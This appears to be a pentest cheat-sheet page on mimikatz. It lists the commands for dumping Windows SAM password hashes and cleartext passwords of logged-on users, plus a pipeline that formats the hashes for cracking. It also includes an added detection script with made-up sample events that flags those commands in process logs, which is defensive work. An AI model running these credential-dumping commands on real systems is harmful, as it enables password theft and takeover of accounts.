# mimikatz

## Dump Password Hashes

Mimikatz needs to be run as SYSTEM, and the SeDebugPrivilege access right needs to be enabled. After launching mimikatz, run:

```bash
privilege::debug
token::elevate
```

*If you are already SYSTEM, you do not need to run the second command.*

Now dump the password hashes:

```bash
lsadump::sam
```

The output is not in a format that john or hashcat can read directly. To convert it to `user:hash` lines, run the following on the saved output (`lsadump.txt`):

```bash
# Drop only grep's "--" group separators, so user names containing "-" are kept
grep 'User' -A 1 lsadump.txt | grep -v '^--$' | cut -d ':' -f 2 | sed 's/ //' | sed '$!N;s/\n/:/'
```

## Dump Passwords of Logged on Users

It is possible to get cleartext passwords of users that are logged on. After launching mimikatz, run:

```bash
privilege::debug
token::elevate
```

*If you are already SYSTEM, you do not need to run the second command.*

Now dump the passwords and hashes:

```bash
sekurlsa::logonpasswords
```
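
From the defender's side, the commands in both sections above are a usable detection signature when they show up as process arguments. The following is an added example, not part of the original page: it scans process-creation records for them, assuming a constructed tab-separated format (time, host, user, command line) with made-up hosts, users and paths.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): flag process command lines that
# contain the mimikatz commands listed on this page.
# Assumed input: one event per line, tab-separated: time, host, user, command line.
# Only commands passed as process arguments are visible this way; commands typed
# into an interactive mimikatz console never reach process-creation logs.

# Constructed sample events (hosts, users and paths are made up).
sample_events() {
  printf '%s\t%s\t%s\t%s\n' \
    '2024-01-10T09:00:01Z' 'WS01' 'alice' 'C:\Windows\System32\notepad.exe notes.txt' \
    '2024-01-10T09:02:13Z' 'WS01' 'alice' 'C:\Temp\m.exe "privilege::debug" "sekurlsa::logonpasswords" exit' \
    '2024-01-10T09:05:40Z' 'SRV02' 'svc_backup' 'tool.exe PRIVILEGE::DEBUG Token::Elevate LSADUMP::SAM exit' \
    '2024-01-10T09:07:00Z' 'SRV02' 'bob' 'powershell.exe -Command Get-Process'
}

# Prints: time, host, user, severity, matched commands (comma-separated).
# severity is "dump" when a credential-dumping command is present, else "prep".
flag_mimikatz() {
  awk -F '\t' '
    BEGIN {
      OFS = "\t"
      n = split("privilege::debug token::elevate lsadump::sam sekurlsa::logonpasswords", cmds, " ")
    }
    {
      line = tolower($4); hits = ""; sev = "prep"   # match case-insensitively
      for (i = 1; i <= n; i++) {
        if (index(line, cmds[i]) > 0) {
          hits = hits (hits == "" ? "" : ",") cmds[i]
          if (cmds[i] ~ /^(lsadump|sekurlsa)::/) sev = "dump"
        }
      }
      if (hits != "") print $1, $2, $3, sev, hits
    }'
}

sample_events | flag_mimikatz
```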

## Resources

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)
